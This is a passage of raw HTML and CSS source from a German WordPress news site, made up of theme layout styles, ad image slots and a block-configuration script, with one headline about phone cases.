  2144.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/die-zukunft-der-handyhuellen/"  rel="bookmark" title="Die Zukunft der Handyhüllen: innovative Materialien und Funktionen">Die Zukunft der Handyhüllen: innovative Materialien und Funktionen</a></h3>
  2145.                    
  2146.                    
  2147.                    
  2148.                    
  2149.                                    </div>
  2150.            </div>
  2151.        </div>
  2152.  
  2153.        </div></div></div></div></div></div><div id="tdi_168" class="tdc-row stretch_row_1400 td-stretch-content"><div class="vc_row tdi_169  wpb_row td-pb-row" >
  2154. <style scoped>.tdi_169,.tdi_169 .tdc-columns{min-height:0}.tdi_169,.tdi_169 .tdc-columns{display:block}.tdi_169 .tdc-columns{width:100%}.tdi_169{margin-bottom:60px!important}.tdi_169 .td_block_wrap{text-align:left}@media (min-width:1019px) and (max-width:1140px){.tdi_169{margin-bottom:40px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_169{margin-bottom:40px!important}}</style><div class="vc_column tdi_171  wpb_column vc_column_container tdc-column td-pb-span12">
  2155. <style scoped>.tdi_171{vertical-align:baseline}.tdi_171>.wpb_wrapper,.tdi_171>.wpb_wrapper>.tdc-elements{display:block}.tdi_171>.wpb_wrapper>.tdc-elements{width:100%}.tdi_171>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_171>.wpb_wrapper{width:auto;height:auto}</style><div class="wpb_wrapper" ><div class="td_block_wrap td-a-rec td-a-rec-id-custom-spot td-a-rec-img tdi_172 td_block_template_1">
  2156. <style>.tdi_172.td-a-rec{text-align:center}.tdi_172.td-a-rec:not(.td-a-rec-no-translate){transform:translateZ(0)}.tdi_172 .td-element-style{z-index:-1}.tdi_172 .td-spot-id-spot_img_hidden{display:none}.tdi_172 .td-adspot-title{display:block}@media (min-width:1019px) and (max-width:1140px){.tdi_172 .td_spot_img_all{display:none}.tdi_172 .td-adspot-title{display:block}}@media (min-width:768px) and (max-width:1018px){.tdi_172 .td_spot_img_all{display:none}.tdi_172 .td-adspot-title{display:block}}@media (max-width:767px){.tdi_172 .td_spot_img_all{display:none}.tdi_172 .td-adspot-title{display:block}}@media (min-width:1141px){.tdi_172 .td_spot_img_all{display:none}}@media (min-width:1019px) and (max-width:1140px){.tdi_172 .td_spot_img_all,.tdi_172 .td_spot_img_tl,.tdi_172 .td-adspot-title{display:none}}@media (min-width:768px) and (max-width:1018px){.tdi_172 .td_spot_img_all,.tdi_172 .td_spot_img_tp,.tdi_172 .td-adspot-title{display:none}}@media (max-width:767px){.tdi_172 .td_spot_img_all,.tdi_172 .td_spot_img_mob,.tdi_172 .td-adspot-title{display:none}}</style><div style="display: inline-block"><a href="https://nachrichtenmorgen.de/" class="td_spot_img_all"><img decoding="async" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%200%200'%3E%3C/svg%3E"  alt="spot_img" data-lazy-src="https://nachrichtenmorgen.de/wp-content/uploads/2023/02/rec-co.jpg" /><noscript><img decoding="async" src="https://nachrichtenmorgen.de/wp-content/uploads/2023/02/rec-co.jpg"  alt="spot_img" /></noscript></a><a href="https://nachrichtenmorgen.de/" class="td_spot_img_tl"><img decoding="async" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%200%200'%3E%3C/svg%3E"  alt="spot_img" data-lazy-src="https://nachrichtenmorgen.de/wp-content/uploads/2023/02/www.nachrichtenmorgen.de_.jpg" /><noscript><img decoding="async" src="https://nachrichtenmorgen.de/wp-content/uploads/2023/02/www.nachrichtenmorgen.de_.jpg"  alt="spot_img" /></noscript></a><a href="https://nachrichtenmorgen.de/" class="td_spot_img_tp"><img decoding="async" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%200%200'%3E%3C/svg%3E"  alt="spot_img" data-lazy-src="https://nachrichtenmorgen.de/wp-content/uploads/2023/02/www.nachrichtenmorgen.de_.jpg" /><noscript><img decoding="async" src="https://nachrichtenmorgen.de/wp-content/uploads/2023/02/www.nachrichtenmorgen.de_.jpg"  alt="spot_img" /></noscript></a><a href="https://nachrichtenmorgen.de/" class="td_spot_img_mob"><img decoding="async" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%200%200'%3E%3C/svg%3E"  alt="spot_img" data-lazy-src="https://nachrichtenmorgen.de/wp-content/uploads/2023/02/rec-sb@2x.jpg" /><noscript><img decoding="async" src="https://nachrichtenmorgen.de/wp-content/uploads/2023/02/rec-sb@2x.jpg"  alt="spot_img" /></noscript></a></div></div></div></div></div></div><div id="tdi_173" class="tdc-row stretch_row_1400 td-stretch-content"><div class="vc_row tdi_174  wpb_row td-pb-row tdc-element-style" >
  2157. <style scoped>.tdi_174,.tdi_174 .tdc-columns{min-height:0}#tdi_173.tdc-row[class*='stretch_row']>.td-pb-row>.td-element-style,#tdi_173.tdc-row[class*='stretch_row']>.td-pb-row>.tdc-video-outer-wrapper{width:100%!important}.tdi_174,.tdi_174 .tdc-columns{display:block}.tdi_174 .tdc-columns{width:100%}@media (min-width:768px){.tdi_174{margin-left:-10px;margin-right:-10px}.tdi_174 .tdc-row-video-background-error,.tdi_174>.vc_column,.tdi_174>.tdc-columns>.vc_column{padding-left:10px;padding-right:10px}}@media (min-width:1019px) and (max-width:1140px){@media (min-width:768px){.tdi_174{margin-left:-8px;margin-right:-8px}.tdi_174 .tdc-row-video-background-error,.tdi_174>.vc_column,.tdi_174>.tdc-columns>.vc_column{padding-left:8px;padding-right:8px}}}@media (min-width:768px) and (max-width:1018px){@media (min-width:768px){.tdi_174{margin-left:-5px;margin-right:-5px}.tdi_174 .tdc-row-video-background-error,.tdi_174>.vc_column,.tdi_174>.tdc-columns>.vc_column{padding-left:5px;padding-right:5px}}}@media (max-width:767px){@media (min-width:768px){.tdi_174{margin-left:-0px;margin-right:-0px}.tdi_174 .tdc-row-video-background-error,.tdi_174>.vc_column,.tdi_174>.tdc-columns>.vc_column{padding-left:0px;padding-right:0px}}}.tdi_174{margin-right:0px!important;margin-bottom:60px!important;margin-left:0px!important;padding-top:24px!important;padding-right:15px!important;padding-bottom:24px!important;padding-left:15px!important;box-shadow:0 4px 20px rgba(0,0,0,0.09)!important;position:relative}.tdi_174 .td_block_wrap{text-align:left}@media (min-width:1019px) and (max-width:1140px){.tdi_174{margin-bottom:40px!important;padding-top:20px!important;padding-right:10px!important;padding-bottom:20px!important;padding-left:10px!important;box-shadow:0 4px 20px rgba(0,0,0,0.09)!important}}@media (min-width:768px) and (max-width:1018px){.tdi_174{margin-bottom:40px!important;padding-top:15px!important;padding-right:10px!important;padding-bottom:15px!important;padding-left:10px!important;box-shadow:0 4px 20px rgba(0,0,0,0.09)!important}}@media (max-width:767px){.tdi_174{padding-top:15px!important;padding-bottom:15px!important;box-shadow:0 4px 20px rgba(0,0,0,0.09)!important}}</style>
  2158. <div class="tdi_173_rand_style td-element-style" ><style>.tdi_173_rand_style{background-color:#ffffff!important}</style></div><div class="vc_column tdi_176  wpb_column vc_column_container tdc-column td-pb-span5">
  2159. <style scoped>.tdi_176{vertical-align:baseline}.tdi_176>.wpb_wrapper,.tdi_176>.wpb_wrapper>.tdc-elements{display:block}.tdi_176>.wpb_wrapper>.tdc-elements{width:100%}.tdi_176>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_176>.wpb_wrapper{width:auto;height:auto}@media (max-width:767px){.tdi_176{margin-bottom:30px!important}}</style><div class="wpb_wrapper" ><div class="vc_row_inner tdi_178  vc_row vc_inner wpb_row td-pb-row absolute_inner_full" >
  2160. <style scoped>.tdi_178{position:absolute!important;top:0;z-index:1}.tdi_178,.tdi_178 .tdc-inner-columns{display:block}.tdi_178 .tdc-inner-columns{width:100%}.tdi_178{margin-top:-32px!important}.tdi_178 .td_block_wrap{text-align:left}@media (min-width:768px) and (max-width:1018px){.tdi_178{margin-top:-22px!important}}@media (min-width:1019px) and (max-width:1140px){.tdi_178{margin-top:-28px!important}}</style><div class="vc_column_inner tdi_180  wpb_column vc_column_container tdc-inner-column td-pb-span12">
  2161. <style scoped>.tdi_180{vertical-align:baseline}.tdi_180 .vc_column-inner>.wpb_wrapper,.tdi_180 .vc_column-inner>.wpb_wrapper .tdc-elements{display:block}.tdi_180 .vc_column-inner>.wpb_wrapper .tdc-elements{width:100%}</style><div class="vc_column-inner"><div class="wpb_wrapper" ><div class="tdm_block td_block_wrap tdm_block_inline_text tdi_181 tdm-inline-block td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_181" >
  2162. <style>.tdi_181{margin-left:20px!important;padding-top:8px!important;padding-right:16px!important;padding-bottom:10px!important;padding-left:14px!important;z-index:1!important;position:relative}@media (min-width:1019px) and (max-width:1140px){.tdi_181{padding-top:6px!important;padding-right:14px!important;padding-bottom:8px!important;padding-left:12px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_181{margin-left:15px!important;padding-top:4px!important;padding-right:12px!important;padding-bottom:6px!important;padding-left:10px!important}}</style>
  2163. <style>.tdi_181{text-align:left!important}.tdi_181 .tdm-descr{color:#ffffff;font-family:PT Serif!important;font-size:20px!important;font-style:italic!important;font-weight:700!important;letter-spacing:0.5px!important}@media (min-width:1019px) and (max-width:1140px){.tdi_181 .tdm-descr{font-size:18px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_181 .tdm-descr{font-size:16px!important}}</style>
  2164. <div class="tdi_181_rand_style td-element-style"><style>
  2165. .tdi_181_rand_style{
  2166. background-color:#ec3535 !important;
  2167. }
  2168. </style></div><p class="tdm-descr">Exklusiver Inhalt</p></div></div></div></div></div><div class="td_block_wrap td_flex_block_2 tdi_182 td-flb-margin-left td-pb-border-top td_block_template_1 tdc-no-posts td_flex_block"  data-td-block-uid="tdi_182" >
  2169. <style>.tdi_182{margin-bottom:0px!important}</style>
  2170. <style>.tdi_182 .td-module-thumb{height:600px}.tdi_182 .td-module-thumb{margin-left:-0px}.tdi_182 .td_module_wrap{margin-bottom:0px}.tdi_182 .td_module_wrap:last-child{margin-bottom:0}.tdi_182.td_with_ajax_pagination .td-next-prev-wrap{align-items:flex-start;justify-content:flex-end;padding:20px 20px 0 0}.tdi_182 .entry-thumb{background-position:center 50%}body .tdi_182 .td-favorite{font-size:36px;box-shadow:1px 1px 4px 0px rgba(0,0,0,0.2)}.tdi_182 .td-video-play-ico{top:50%;left:50%;transform:translate(-50%,-50%)}.tdi_182 .td-post-vid-time{display:inline-block}.tdi_182 .td-post-category{padding:5px 8px;border-radius:2px;font-family:Work Sans!important;font-size:13px!important;line-height:1!important;font-weight:600!important;text-transform:uppercase!important;background-color:#ec3535;color:#ffffff}.tdi_182 .td-module-meta-info{top:auto;bottom:0;padding:0 25px 25px}.tdi_182 .entry-title{margin:0 0 12px 0;font-family:Source Serif Pro!important;font-size:26px!important;line-height:1.2!important;font-weight:700!important}.tdi_182 .td-excerpt{margin:0px;font-family:Work Sans!important;font-size:14px!important;line-height:1.5!important;font-weight:500!important;color:#ffffff}.tdi_182 .td-post-category:not(.td-post-extra-category){display:none}.tdi_182 .td-author-date{display:inline}.tdi_182 .td-post-author-name{display:none}.tdi_182 .td-post-date,.tdi_182 .td-post-author-name span{display:none}.tdi_182 .entry-review-stars{display:inline-block}.tdi_182 .td-icon-star,.tdi_182 .td-icon-star-empty,.tdi_182 .td-icon-star-half{font-size:15px}.tdi_182 .td-module-comments{display:none}.tdi_182 .td-read-more{display:none}.tdi_182 .td-module-exclusive .td-module-title a:before{display:inline-block;margin:-2px 10px 0 0;padding:5px 8px;border-radius:2px;color:#ffffff;background-color:#ec3535;font-family:Work Sans!important;font-size:13px!important;line-height:1!important;font-weight:600!important;text-transform:uppercase!important}.tdi_182 .td-module-exclusive:hover .td-module-title a:before{color:#ffffff;background-color:#ec3535}.tdi_182 .td-read-more a{font-family:Work Sans!important;text-transform:uppercase!important;background-color:rgba(255,255,255,0)!important}.tdi_182 .td-module-thumb a:after{content:'';position:absolute;top:0;left:0;width:100%;height:100%;background:-webkit-linear-gradient(0deg,rgba(0,0,0,0.8),rgba(0,0,0,0.5) 42%,rgba(0,0,0,0) 61%,rgba(0,0,0,0));background:linear-gradient(0deg,rgba(0,0,0,0.8),rgba(0,0,0,0.5) 42%,rgba(0,0,0,0) 61%,rgba(0,0,0,0))}.tdi_182 .td-post-category:hover{background-color:#000000;color:#ffffff}.tdi_182 .td-module-title a{color:#ffffff;box-shadow:inset 0 0 0 0 #000}.tdi_182 .td_module_wrap:hover .td-module-title a{color:rgba(255,255,255,0.8)}.tdi_182 .td-post-author-name a{color:#000000}html:not([class*='ie']) .tdi_182 .td-module-container:hover .entry-thumb:before{opacity:0}.tdi_182 .td-read-more:hover a{background-color:rgba(255,255,255,0)!important}@media (min-width:768px){.tdi_182 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}@media (min-width:1019px) and (max-width:1140px){.tdi_182 .td-module-thumb{height:500px}.tdi_182 .td-module-meta-info{padding:0 20px 20px}.tdi_182 .entry-title{margin:12px 0 10px 0;font-size:25px!important}.tdi_182 .td-module-exclusive .td-module-title a:before{font-size:12px!important}.tdi_182 .td-post-category{font-size:12px!important}.tdi_182 .td-module-title a{box-shadow:inset 0 0 0 0 #000}@media (min-width:768px){.tdi_182 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (min-width:768px) and (max-width:1018px){.tdi_182 .td-module-thumb{height:400px}.tdi_182 .td-post-category{padding:4px 6px;font-size:12px!important}.tdi_182 .td-module-meta-info{padding:0 15px 15px}.tdi_182 .entry-title{margin:10px 0 6px 0;font-size:21px!important}.tdi_182 .td-module-exclusive .td-module-title a:before{font-size:12px!important}.tdi_182 .td-excerpt{font-size:13px!important}.tdi_182 .td-module-title a{box-shadow:inset 0 0 0 0 #000}@media (min-width:768px){.tdi_182 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (max-width:767px){.tdi_182 .td-module-thumb{height:500px}.tdi_182 .td-module-meta-info{max-width:100%;padding:0 20px 20px}.tdi_182 .entry-title{margin:12px 0 10px 0;font-size:21px!important}.tdi_182 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_182 .td-post-category{font-size:12px!important}.tdi_182 .td-excerpt{font-size:13px!important}.tdi_182 .td-module-title a{box-shadow:inset 0 0 0 0 #000}@media (min-width:768px){.tdi_182 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}</style><script type="rocketlazyloadscript">var block_tdi_182 = new tdBlock();
  2171. block_tdi_182.id = "tdi_182";
  2172. block_tdi_182.atts = '{"modules_on_row":"","limit":"3","modules_category":"above","show_btn":"none","show_excerpt":"","ajax_pagination":"","td_ajax_preloading":"","sort":"","category_id":"54","f_title_font_size":"eyJhbGwiOiIyNiIsImxhbmRzY2FwZSI6IjI1IiwicG9ydHJhaXQiOiIyMSIsInBob25lIjoiMjEifQ==","f_title_font_line_height":"1.2","show_cat":"none","meta_info_border_style":"","meta_padding":"eyJhbGwiOiIwIDI1cHggMjVweCIsImxhbmRzY2FwZSI6IjAgMjBweCAyMHB4IiwicG9ydHJhaXQiOiIwIDE1cHggMTVweCIsInBob25lIjoiMCAyMHB4IDIwcHgifQ==","modules_divider":"","image_size":"td_1068x0","meta_info_align":"bottom","image_floated":"","tdc_css":"eyJhbGwiOnsibWFyZ2luLWJvdHRvbSI6IjAiLCJkaXNwbGF5IjoiIn0sImxhbmRzY2FwZSI6eyJkaXNwbGF5IjoiIn0sImxhbmRzY2FwZV9tYXhfd2lkdGgiOjExNDAsImxhbmRzY2FwZV9taW5fd2lkdGgiOjEwMTksInBvcnRyYWl0Ijp7ImRpc3BsYXkiOiIifSwicG9ydHJhaXRfbWF4X3dpZHRoIjoxMDE4LCJwb3J0cmFpdF9taW5fd2lkdGgiOjc2OCwicGhvbmUiOnsiZGlzcGxheSI6IiJ9LCJwaG9uZV9tYXhfd2lkdGgiOjc2N30=","meta_info_horiz":"content-horiz-left","f_title_font_weight":"700","image_height":"eyJhbGwiOiIxMDAiLCJwb3J0cmFpdCI6IjE0MCJ9","all_modules_space":"0","art_excerpt":"0","art_title":"eyJhbGwiOiIwIDAgMTJweCAwIiwibGFuZHNjYXBlIjoiMTJweCAwIDEwcHggMCIsInBvcnRyYWl0IjoiMTBweCAwIDZweCAwIiwicGhvbmUiOiIxMnB4IDAgMTBweCAwIn0=","btn_bg":"rgba(255,255,255,0)","f_btn_font_transform":"uppercase","f_btn_font_weight":"","f_ex_font_weight":"500","f_cat_font_transform":"uppercase","f_cat_font_weight":"600","btn_bg_hover":"rgba(255,255,255,0)","f_ex_font_size":"eyJhbGwiOiIxNCIsInBvcnRyYWl0IjoiMTMiLCJwaG9uZSI6IjEzIn0=","f_ex_font_line_height":"1.5","meta_width":"eyJwaG9uZSI6IjEwMCUifQ==","show_audio":"","show_com":"none","show_date":"none","show_author":"none","mc1_el":"10","f_title_font_family":"721","f_title_font_transform":"","f_ex_font_family":"653","title_txt":"#ffffff","title_txt_hover":"rgba(255,255,255,0.8)","ex_txt":"#ffffff","cat_txt":"#ffffff","cat_bg":"#ec3535","cat_bg_hover":"#000000","author_txt":"#000000","modules_category_padding":"eyJhbGwiOiI1cHggOHB4IiwicG9ydHJhaXQiOiI0cHggNnB4In0=","f_cat_font_family":"653","f_cat_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIiLCJsYW5kc2NhcGUiOiIxMiIsInBob25lIjoiMTIifQ==","f_cat_font_line_height":"1","excerpt_middle":"yes","cat_txt_hover":"#ffffff","modules_gap":"0","modules_space":"0","modules_height":"eyJhbGwiOiI2MDAiLCJwb3J0cmFpdCI6IjQwMCIsInBob25lIjoiNTAwIiwibGFuZHNjYXBlIjoiNTAwIn0=","image_margin":"0","color_overlay":"eyJ0eXBlIjoiZ3JhZGllbnQiLCJjb2xvcjEiOiJyZ2JhKDAsMCwwLDApIiwiY29sb3IyIjoicmdiYSgwLDAsMCwwLjgpIiwibWl4ZWRDb2xvcnMiOlt7ImNvbG9yIjoicmdiYSgwLDAsMCwwLjUpIiwicGVyY2VudGFnZSI6NDJ9LHsiY29sb3IiOiJyZ2JhKDAsMCwwLDApIiwicGVyY2VudGFnZSI6NjF9XSwiZGVncmVlIjoiMCIsImNzcyI6ImJhY2tncm91bmQ6IC13ZWJraXQtbGluZWFyLWdyYWRpZW50KDBkZWcscmdiYSgwLDAsMCwwLjgpLHJnYmEoMCwwLDAsMC41KSA0MiUscmdiYSgwLDAsMCwwKSA2MSUscmdiYSgwLDAsMCwwKSk7YmFja2dyb3VuZDogbGluZWFyLWdyYWRpZW50KDBkZWcscmdiYSgwLDAsMCwwLjgpLHJnYmEoMCwwLDAsMC41KSA0MiUscmdiYSgwLDAsMCwwKSA2MSUscmdiYSgwLDAsMCwwKSk7IiwiY3NzUGFyYW1zIjoiMGRlZyxyZ2JhKDAsMCwwLDAuOCkscmdiYSgwLDAsMCwwLjUpIDQyJSxyZ2JhKDAsMCwwLDApIDYxJSxyZ2JhKDAsMCwwLDApIn0=","mc2_el":"26","modules_category_radius":"2","locked_only":"yes","excl_color":"#ffffff","excl_color_h":"#ffffff","excl_bg":"#ec3535","excl_bg_h":"#ec3535","excl_radius":"2","excl_padd":"5px 8px","f_excl_font_transform":"uppercase","f_excl_font_weight":"600","f_excl_font_family":"653","f_excl_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIiLCJsYW5kc2NhcGUiOiIxMiIsInBob25lIjoiMTEifQ==","f_excl_font_line_height":"1","excl_margin":"-2px 10px 0 0","title_tag":"div","f_btn_font_family":"653","post_ids":"td_encvalWyBpZDogNTQgXQ==","block_type":"td_flex_block_2","separator":"","custom_title":"","custom_url":"","block_template_id":"","mc2_tl":"","mc2_title_tag":"","taxonomies":"","category_ids":"","in_all_terms":"","tag_slug":"","autors_id":"","installed_post_types":"","include_cf_posts":"","exclude_cf_posts":"","linked_posts":"","favourite_only":"","offset":"","open_in_new_window":"","show_modified_date":"","time_ago":"","time_ago_add_txt":"ago","time_ago_txt_pos":"","review_source":"","el_class":"","td_query_cache":"","td_query_cache_expiration":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","block_title_over":"","block_title_space":"","image_alignment":"50","image_radius":"","image_margin_right":"","image_margin_forced":"","show_favourites":"","fav_size":"2","fav_space":"","fav_ico_color":"","fav_ico_color_h":"","fav_bg":"","fav_bg_h":"","fav_shadow_shadow_header":"","fav_shadow_shadow_title":"Shadow","fav_shadow_shadow_size":"","fav_shadow_shadow_offset_horizontal":"","fav_shadow_shadow_offset_vertical":"","fav_shadow_shadow_spread":"","fav_shadow_shadow_color":"","video_icon":"","video_icon_pos":"center","video_popup":"yes","video_rec":"","spot_header":"","video_rec_title":"","video_rec_color":"","video_rec_disable":"","autoplay_vid":"","show_vid_t":"inline-block","vid_t_margin":"","vid_t_padding":"","video_title_color":"","video_title_color_h":"","video_bg":"","video_overlay":"","vid_t_color":"","vid_t_bg_color":"","f_vid_title_font_header":"","f_vid_title_font_title":"Video pop-up article title","f_vid_title_font_settings":"","f_vid_title_font_family":"","f_vid_title_font_size":"","f_vid_title_font_line_height":"","f_vid_title_font_style":"","f_vid_title_font_weight":"","f_vid_title_font_transform":"","f_vid_title_font_spacing":"","f_vid_title_":"","f_vid_time_font_title":"Video duration text","f_vid_time_font_settings":"","f_vid_time_font_family":"","f_vid_time_font_size":"","f_vid_time_font_line_height":"","f_vid_time_font_style":"","f_vid_time_font_weight":"","f_vid_time_font_transform":"","f_vid_time_font_spacing":"","f_vid_time_":"","excl_show":"inline-block","excl_txt":"","all_excl_border":"","all_excl_border_style":"solid","all_excl_border_color":"","excl_border_color_h":"","f_excl_font_header":"","f_excl_font_title":"Label text","f_excl_font_settings":"","f_excl_font_style":"","f_excl_font_spacing":"","f_excl_":"","meta_margin":"","meta_info_border_radius":"","modules_category_margin":"","modules_cat_border":"","modules_extra_cat":"","show_review":"inline-block","review_space":"","review_size":"2.5","review_distance":"","btn_title":"","btn_margin":"","btn_padding":"","btn_border_width":"","btn_radius":"","nextprev_position":"top","nextprev_split":"","nextprev":"","pag_padding":"","pag_border_width":"","pag_border_radius":"","prev_tdicon":"","next_tdicon":"","pag_icons_size":"","pag_icons_space":"","f_header_font_header":"","f_header_font_title":"Block header","f_header_font_settings":"","f_header_font_family":"","f_header_font_size":"","f_header_font_line_height":"","f_header_font_style":"","f_header_font_weight":"","f_header_font_transform":"","f_header_font_spacing":"","f_header_":"","f_ajax_font_title":"Ajax categories","f_ajax_font_settings":"","f_ajax_font_family":"","f_ajax_font_size":"","f_ajax_font_line_height":"","f_ajax_font_style":"","f_ajax_font_weight":"","f_ajax_font_transform":"","f_ajax_font_spacing":"","f_ajax_":"","f_more_font_title":"Load more button","f_more_font_settings":"","f_more_font_family":"","f_more_font_size":"","f_more_font_line_height":"","f_more_font_style":"","f_more_font_weight":"","f_more_font_transform":"","f_more_font_spacing":"","f_more_":"","f_title_font_header":"","f_title_font_title":"Article title","f_title_font_settings":"","f_title_font_style":"","f_title_font_spacing":"","f_title_":"","f_cat_font_title":"Article category tag","f_cat_font_settings":"","f_cat_font_style":"","f_cat_font_spacing":"","f_cat_":"","f_meta_font_title":"Article meta info","f_meta_font_settings":"","f_meta_font_family":"","f_meta_font_size":"","f_meta_font_line_height":"","f_meta_font_style":"","f_meta_font_weight":"","f_meta_font_transform":"","f_meta_font_spacing":"","f_meta_":"","f_ex_font_title":"Article excerpt","f_ex_font_settings":"","f_ex_font_style":"","f_ex_font_transform":"","f_ex_font_spacing":"","f_ex_":"","f_btn_font_title":"Article read more button","f_btn_font_settings":"","f_btn_font_size":"","f_btn_font_line_height":"","f_btn_font_style":"","f_btn_font_spacing":"","f_btn_":"","mix_color":"","mix_type":"","fe_brightness":"1","fe_contrast":"1","fe_saturate":"1","mix_color_h":"","mix_type_h":"","fe_brightness_h":"1","fe_contrast_h":"1","fe_saturate_h":"1","meta_bg":"","nextprev_icon":"","nextprev_icon_h":"","nextprev_bg":"","nextprev_bg_h":"","all_underline_height":"","all_underline_color":"","cat_border":"","cat_border_hover":"","author_txt_hover":"","date_txt":"","com_txt":"","com_icon":"","rev_txt":"","btn_txt":"","btn_txt_hover":"","btn_border":"","btn_border_hover":"","ajax_pagination_next_prev_swipe":"","ajax_pagination_infinite_stop":"","css":"","td_column_number":1,"header_color":"","color_preset":"","border_top":"","class":"tdi_182","tdc_css_class":"tdi_182","tdc_css_class_style":"tdi_182_rand_style"}';
  2173. block_tdi_182.td_column_number = "1";
  2174. block_tdi_182.block_type = "td_flex_block_2";
  2175. block_tdi_182.post_count = "0";
  2176. block_tdi_182.found_posts = "0";
  2177. block_tdi_182.header_color = "";
  2178. block_tdi_182.ajax_pagination_infinite_stop = "";
  2179. block_tdi_182.max_num_pages = "0";
  2180. tdBlocksArray.push(block_tdi_182);
  2181. </script><div class="td-block-title-over"><div class="td-block-title-wrap"></div></div><div class="td-block-inner-pagination"><div id=tdi_182 class="td_block_inner td-mc2-wrap"></div></div></div></div></div><div class="vc_column tdi_184  wpb_column vc_column_container tdc-column td-pb-span7">
  2182. <style scoped>.tdi_184{vertical-align:baseline}.tdi_184>.wpb_wrapper,.tdi_184>.wpb_wrapper>.tdc-elements{display:block}.tdi_184>.wpb_wrapper>.tdc-elements{width:100%}.tdi_184>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_184>.wpb_wrapper{width:auto;height:auto}</style><div class="wpb_wrapper" ><div class="td_block_wrap td_flex_block_1 tdi_185 td-pb-border-top td_block_template_1 tdc-no-posts td_flex_block"  data-td-block-uid="tdi_185" >
  2183. <style>.tdi_185{margin-bottom:0px!important}@media (max-width:767px){.tdi_185{margin-bottom:0px!important}}</style>
  2184. <style>.tdi_185 .td-image-wrap{padding-bottom:54%}.tdi_185 .entry-thumb{background-position:center 50%}.tdi_185 .td-module-container{flex-direction:column;border-color:#eaeaea!important}.tdi_185 .td-image-container{display:block;order:0;margin-left:0;margin-right:auto}.ie10 .tdi_185 .td-module-meta-info,.ie11 .tdi_185 .td-module-meta-info{flex:auto}body .tdi_185 .td-favorite{font-size:36px;box-shadow:1px 1px 4px 0px rgba(0,0,0,0.2)}.tdi_185 .td-module-meta-info{padding:16px 0 0 0;border-color:#eaeaea}.tdi_185 .td_module_wrap{width:50%;float:left;padding-left:10px;padding-right:10px;padding-bottom:15px;margin-bottom:15px}.rtl .tdi_185 .td_module_wrap{float:right}.tdi_185 .td_block_inner{margin-left:-10px;margin-right:-10px}.tdi_185 .td-module-container:before{bottom:-15px;border-color:#eaeaea}.tdi_185 .td-post-vid-time{display:block}.tdi_185 .td-post-category{margin:0px;padding:0px;background-color:rgba(255,255,255,0);color:#000000;border-width:0px;border-style:solid;border-color:#aaa;font-family:Work Sans!important;font-size:13px!important;line-height:1!important;font-weight:600!important;text-transform:uppercase!important;letter-spacing:-0.5px!important}.tdi_185 .td-author-photo .avatar{width:20px;height:20px;margin-right:6px;border-radius:50%}.tdi_185 .td-excerpt{display:none;margin:0px;column-count:1;column-gap:48px}.tdi_185 .td-audio-player{opacity:1;visibility:visible;height:auto;font-size:13px}.tdi_185 .td-read-more{display:none}.tdi_185 .td-author-date{display:inline}.tdi_185 .td-post-author-name{display:none}.tdi_185 .td-post-date,.tdi_185 .td-post-author-name span{display:none}.tdi_185 .entry-review-stars{display:inline-block}.tdi_185 .td-icon-star,.tdi_185 .td-icon-star-empty,.tdi_185 .td-icon-star-half{font-size:15px}.tdi_185 .td-module-comments{display:none}.tdi_185 .td_module_wrap:nth-child(2n+1){clear:both}.tdi_185 .td_module_wrap:nth-last-child(-n+2){margin-bottom:0;padding-bottom:0}.tdi_185 .td_module_wrap:nth-last-child(-n+2) .td-module-container:before{display:none}.tdi_185 .td-post-category:hover{background-color:rgba(255,255,255,0)!important;color:#ec3535}.tdi_185 .td-module-title a{color:#000000;box-shadow:inset 0 0 0 0 #000}.tdi_185 .td_module_wrap:hover .td-module-title a{color:#f43f3f!important}.tdi_185 .td-module-meta-info,.tdi_185 .td-next-prev-wrap{text-align:left}.tdi_185 .td-category-pos-above .td-post-category{align-self:flex-start!important}.tdi_185 .td-category-pos-image .td-post-category:not(.td-post-extra-category){left:0;right:auto;transform:translateX(0);-webkit-transform:translateX(0)}.tdi_185 .td-ajax-next-page{margin-right:auto;margin-left:0}.tdi_185 .td-module-exclusive .td-module-title a:before{display:inline-block;margin:-4px 8px 0 0;padding:4px 6px;border-radius:2px;color:#ffffff;background-color:#ec3535;font-family:Work Sans!important;font-size:12px!important;line-height:1!important;font-weight:600!important;text-transform:uppercase!important}.tdi_185 .td-module-exclusive:hover .td-module-title a:before{color:#ffffff;background-color:#ec3535}.tdi_185 .entry-title{margin:8px 0 0 0;font-family:PT Serif!important;font-size:16px!important;line-height:1.3!important;font-weight:600!important}.tdi_185 .td-read-more a{background-color:rgba(255,255,255,0)!important;text-transform:uppercase!important}.tdi_185 .td-read-more:hover a{background-color:rgba(255,255,255,0)!important}html:not([class*='ie']) .tdi_185 .td-module-container:hover .entry-thumb:before{opacity:0}@media (min-width:768px){.tdi_185 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}@media (min-width:1019px) and (max-width:1140px){.tdi_185 .td-module-meta-info{padding:14px 0 0 0}.tdi_185 .td_module_wrap{padding-left:7.5px;padding-right:7.5px;padding-bottom:10px;margin-bottom:10px;clear:none!important;padding-bottom:10px!important;margin-bottom:10px!important}.tdi_185 .td_block_inner{margin-left:-7.5px;margin-right:-7.5px}.tdi_185 .td-module-container:before{bottom:-10px}.tdi_185 